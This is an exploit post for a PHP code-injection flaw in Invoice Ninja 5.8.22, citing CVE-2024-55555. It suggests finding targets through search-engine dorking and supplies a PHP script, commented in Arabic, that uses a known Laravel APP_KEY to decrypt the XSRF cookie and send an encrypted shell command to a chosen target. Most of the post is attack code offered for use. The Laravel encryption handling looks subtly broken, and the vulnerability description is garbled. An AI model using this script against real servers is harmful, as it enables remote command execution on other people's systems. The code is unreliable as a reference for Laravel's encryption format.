=============================================================================================================================================
| # Title     : Invoice Ninja v 5.8.22 PHP Code Injection Vulnerability                                                                     |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://invoiceninja.com/                                                                                                   |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: A vulnerability in Invoice Ninja can also be exploited via a non-proficient character control attack using Laravel APP_KEY.

   (Related : https://packetstorm.news/files/id/189419/ Related CVE numbers: CVE-2024-55555) .
	
[+] save code as poc.php.

[+] line 85 set target.

[+] Usage = php poc.php

[+] PayLoad :

<?php

// تعريف الدالة التي ستنفذ الأمر
function execute_command($url, $command, $app_key) {
    $cipher_mode = 'AES-256-CBC';

    // إرسال الطلب GET إلى نقطة النهاية
    $response = send_request($url, 'GET', 'application/x-www-form-urlencoded', 'login');

    if ($response['code'] != 200) {
        die("لا يوجد استجابة صالحة من الهدف.");
    }

    // فك التشفير باستخدام APP_KEY
    $xsrf_token = extract_xsrf_token($response['cookies']);
    if (!$xsrf_token) {
        die("لم يتم العثور على XSRF-TOKEN.");
    }

    $decrypted_value = laravel_decrypt($xsrf_token, $app_key, $cipher_mode);
    if (!$decrypted_value) {
        die("فك التشفير باستخدام APP_KEY فشل.");
    }

    echo "APP_KEY صالح: " . $app_key . "\n";
    echo "القيمة المفكوكة: " . $decrypted_value . "\n";

    // تجهيز الحمولة المشفرة
    $payload = base64_encode($command);  // استبدل بـ payload الخاص بك
    $encrypted_payload = laravel_encrypt($payload, $app_key, $cipher_mode);

    if (!$encrypted_payload) {
        die("فشل التشفير باستخدام Laravel.");
    }

    // تنفيذ الأمر
    send_request($url, 'GET', 'application/x-www-form-urlencoded', "route/$encrypted_payload");
}

// دالة إرسال الطلب
function send_request($url, $method, $content_type, $endpoint) {
    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, $url . $endpoint);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        'Content-Type: ' . $content_type
    ]);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);

    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $cookies = curl_getinfo($ch, CURLINFO_COOKIELIST);

    curl_close($ch);

    return ['code' => $http_code, 'cookies' => $cookies, 'response' => $response];
}

// دالة استخراج XSRF-TOKEN من الكوكيز
function extract_xsrf_token($cookies) {
    foreach ($cookies as $cookie) {
        if (strpos($cookie, 'XSRF-TOKEN') !== false) {
            preg_match('/XSRF-TOKEN=([^;]+)/', $cookie, $matches);
            return $matches[1];
        }
    }
    return null;
}

// دالة فك التشفير
function laravel_decrypt($ciphertext, $key, $cipher_mode) {
    // هنا يمكن استخدام خوارزمية AES لفك التشفير
    // استخدم مكتبة OpenSSL في PHP لهذا الغرض
    return openssl_decrypt(base64_decode($ciphertext), $cipher_mode, base64_decode($key), OPENSSL_RAW_DATA);
}

// دالة التشفير
function laravel_encrypt($plaintext, $key, $cipher_mode) {
    // استخدم مكتبة OpenSSL في PHP للتشفير
    return openssl_encrypt($plaintext, $cipher_mode, base64_decode($key), OPENSSL_RAW_DATA);
}

// استدعاء الوظائف مع القيم المناسبة
$url = "https://target.com";
$app_key = "base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=";
$command = "ls -la";  // استبدل بالأمر المطلوب
execute_command($url, $command, $app_key);

?>




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================